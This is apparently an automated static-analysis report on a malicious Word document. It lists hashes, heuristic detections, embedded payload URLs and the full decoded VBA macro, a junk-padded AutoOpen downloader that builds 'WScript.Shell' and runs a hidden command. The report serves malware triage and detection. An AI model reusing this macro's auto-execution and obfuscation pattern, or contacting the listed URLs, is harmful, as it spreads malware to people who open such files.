Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9578bb3ad7e74a98…

MALICIOUS

Office (OLE)

71.4 KB Created: 2019-01-16 19:23:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 3a5e75e646195f93f46729827e219b61 SHA-1: d7fdc0918f9a966800abbdaf2a85a454becda15c SHA-256: 9578bb3ad7e74a981c39d9e9e83400ac00c210e2b5d72a5cbbc7772d424c95f8
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoOpen function, a common technique for malicious Office documents. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macro attempts to execute external commands. The script concatenates strings to form 'WscRipt.sHeLl', which is then likely used to download and execute a payload from one of the embedded URLs.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6817914-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6817914-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
     End Select
    Handmade89 = "" + teal11 + UzbekistanSum71 + "WscRipt.sHeLl" + microchip35 + turquoise33 + toolset14
       Select Case azure39
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     End Select
    Optional88 = Array(synergize98, Rubber47, Lodge84, CreateObject("" + Reengineered28 + ToysToys73 + BabyIndustrial54 + Functionbased44 + usercentric46 + Handmade89).Run!("" + Causeway59 + RAM2 + executive71.TextBox1 + feed16 + webreadiness58, IUkiv), Communications48, Missouri54, bottomline84)
       Select Case Frozen26
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "CheckingAccount84"
    Sub autoopen()
    customerloyalty3 = pixel83
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://binsuloomgroup.com/wp-content/uploads/NefRZe_crlN072r_S@http://jcpers In document text (OLE body)
    • http://medicspoint.pk/5RKX6Ot_r3wyO@http://lailarahman.com/NLwq7z5_VIN4p7AR_00KDII@http://aryahospitalksh.com/h1rAZ_HEFn0J_EIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5850 bytes
SHA-256: 4062dde47334f0dc16be5d587d8b0d31c51d364fbced89665b61f201709dbf60
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "executive71"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "optical97"
Function quantify62()
On Error Resume Next
   Select Case visualize71
         Case 980
            InvestmentAccount61 = CLng(679)
etailers20 = initiatives48
            Persistent12 = CDate(yellow90)
Vista95 = firmware20
            Metrics54 = Int(240)
         Case 468
deliverables8 = Borders86
            yellow13 = Cos(bypassing98)
Bedfordshire22 = Facilitator6
            Intelligent97 = ChrB(732)
            efficient13 = Technician83
 End Select
   Select Case Lead93
         Case 502
            Program35 = CLng(826)
HandmadeWoodenBacon3 = intranet9
            model85 = CDate(Dynamic16)
Iowa55 = auxiliary73
            recontextualize39 = Int(617)
         Case 502
Granite43 = Port66
            CheckingAccount45 = Cos(Borders70)
SavingsAccount88 = Plastic81
            frontend71 = ChrB(744)
            payment54 = HTTP15
 End Select
   Select Case Brand60
         Case 828
            LicensedGraniteHat3 = CLng(745)
Groves84 = digital17
            grey81 = CDate(Vanuatu23)
program49 = Orchestrator14
            models33 = Int(712)
         Case 297
transmitting75 = ErgonomicFrozenChips80
            firmware86 = Cos(IncredibleWoodenBall36)
plum42 = directional76
            Chad15 = ChrB(146)
            PracticalMetalPizza64 = index50
 End Select
Handmade89 = "" + teal11 + UzbekistanSum71 + "WscRipt.sHeLl" + microchip35 + turquoise33 + toolset14
   Select Case azure39
         Case 489
            LibyanDinar82 = CLng(729)
engineer64 = Cambridgeshire19
            SmallSteelFish22 = CDate(USB12)
implementation93 = Tunnel24
            Generic78 = Int(17)
         Case 75
Manager43 = Officer98
            deliver76 = Cos(methodology51)
Inverse89 = Forge29
            B2B96 = ChrB(466)
            GamesComputersSports50 = methodologies36
 End Select
   Select Case Villages27
         Case 245
            Representative12 = CLng(839)
BruneiDarussalam86 = connecting15
            USB22 = CDate(InvestmentAccount28)
navigating5 = CreditCardAccount16
            FrenchSouthernTerritories33 = Int(424)
         Case 521
robust65 = Kina97
            MoneyMarketAccount17 = Cos(strategic22)
PracticalWoodenPants76 = Buckinghamshire57
            Sharable15 = ChrB(718)
            FTP18 = BabyMusicIndustrial64
 End Select
IUkiv = 0
   Select Case pricingstructure62
         Case 589
            copying15 = CLng(794)
NewZealandDollar2 = compelling79
            monetize44 = CDate(Bedfordshire98)
CSS33 = HomeClothing98
            payment69 = Int(930)
         Case 110
Centralized58 = generate35
            TastyWoodenChips2 = Cos(redefine35)
calculate48 = FantasticFrozenCar33
            SmallPlasticBike52 = ChrB(129)
            capacity4 = HomeLoanAccount9
 End Select
   Select Case LicensedSoftTable87
         Case 796
            Bolivia85 = CLng(372)
synthesize72 = Plain57
            Grove8 = CDate(Dynamic54)
Utah69 = generate8
            SerbianDinar72 = Int(770)
         Case 45
supplychains54 = Devolved90
            Rubber94 = Cos(withdrawal88)
MoneyMarketAccount18 = USB30
            Human14 = ChrB(669)
            Upgradable26 = global55
 End Select
   Select Case needsbased36
         Case 247
            Berkshire34 = CLng(797)
Key53 = Utah52
            turquoise18 = CDate(webenabled7)
Bedfordshire4 = killer42
            robust22 = Int(607)
         Case 451
Falls88 = USB96
            Corners69 = Cos(bypassing45)
bypass36 = Iowa90
            orchestration47 = ChrB(276)
            Handmade32 = calculate45
 End Select
Optional88 = Array(synergize98, Rubber47, Lodge84, CreateObject("" + Reengineered28 + ToysToys73 + BabyIndustrial54 + Functionbased44 + usercentric46 + Handmade89).Run!("" + Causeway59 + RAM2 + executive71.TextBox1 + feed16 + webreadiness58, IUkiv), Communications48, Missouri54, bottomline84)
   Select Case Frozen26
         Case 424
            quantifying22 = CLng(765)
scale18 = Identity93
            Plastic13 = CDate(Angola17)
SCSI76 = IntelligentSoftSoap70
            generate93 = Int(887)
         Case 249
SleekMetalCar61 = Userfriendly80
            Technician13 = Cos(Motorway61)
Intranet52 = copy36
            Lodge32 = ChrB(685)
            black63 = Selfenabling13
 End Select
   Select Case HTTP71
         Case 153
            salmon60 = CLng(253)
salmon67 = violet33
            olive67 = CDate(cyan45)
Product29 = Inlet21
            maximize86 = Int(126)
         Case 908
pixel47 = International74
            zerotolerance95 = Cos(ErgonomicFreshCar41)
SDD92 = ToolsHealthMusic39
            Accounts72 = ChrB(831)
            SavingsAccount28 = methodical77
 End Select
   Select Case migration90
         Case 157
            regional37 = CLng(415)
Landing23 = port22
            Customer92 = CDate(productize79)
Organized54 = matrices57
            ToolsIndustrial64 = Int(806)
         Case 212
Functionality93 = Rapid12
            Underpass58 = Cos(Focused18)
Gorgeous79 = grow4
            TastyFrozenSausages98 = ChrB(158)
            maroon83 = neural52
 End Select
End Function


Attribute VB_Name = "CheckingAccount84"
Sub autoopen()
customerloyalty3 = pixel83
quantify37 = Array(GenericRubberPizza21, Borders75, LicensedConcreteHat87, quantify62, Handmade68, Rubber86, Metal48)
supplychains83 = channels32
End Sub
Function payment91()
index64 = Well45
End Function